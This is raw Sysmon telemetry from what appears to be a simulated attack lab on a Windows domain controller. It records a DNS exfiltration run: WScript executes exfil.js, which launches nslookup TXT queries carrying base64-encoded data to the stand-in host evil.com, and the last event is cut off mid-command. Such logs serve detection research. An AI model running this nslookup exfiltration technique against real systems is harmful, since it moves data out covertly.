14:21:44.073{2E1864BB-18F8-629A-5C45-000000005F02}46168080C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-5D45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-5D45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.073{2E1864BB-18F8-629A-5B45-000000005F02}10445252C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-5D45-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.078{2E1864BB-18F8-629A-5D45-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-5B45-000000005F02}1044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeu.tmp 2>&1 354300x8000000000000000213154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.658{00000000-0000-0000-0000-000000000000}2088<unknown process>-udptruefalse127.0.0.1-51044-false127.0.0.1-53domain 354300x8000000000000000213153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.579{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-51039-false127.0.0.1-53domain 10341000x8000000000000000213152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.057{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-5C45-000000005F02}4616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.057{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-5C45-000000005F02}4616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.041{2E1864BB-18F8-629A-5C45-000000005F02}46168080C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-5B45-000000005F02}1044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.041{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-5C45-000000005F02}4616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-5B45-000000005F02}1044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.010{2E1864BB-18E0-629A-6742-000000005F02}39766960C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-5B45-000000005F02}1044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.026{2E1864BB-18F8-629A-5B45-000000005F02}1044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.010{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzexff.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044817Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:42.792{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044816Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:44.315{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4908658880429997668DAABFC7CADB2A,SHA256=A5DC032BD68DC4AE364C9AD97B5BD81E5526E4EFE95C8A9EE3AD05CCD5E46FE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.978{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9E45-000000005F02}5176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.978{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9E45-000000005F02}5176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.978{2E1864BB-18F9-629A-9E45-000000005F02}51767744C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9D45-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.963{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9E45-000000005F02}5176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9D45-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-18E0-629A-6742-000000005F02}39762388C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-9D45-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.947{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.948{2E1864BB-18F9-629A-9D45-000000005F02}7868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 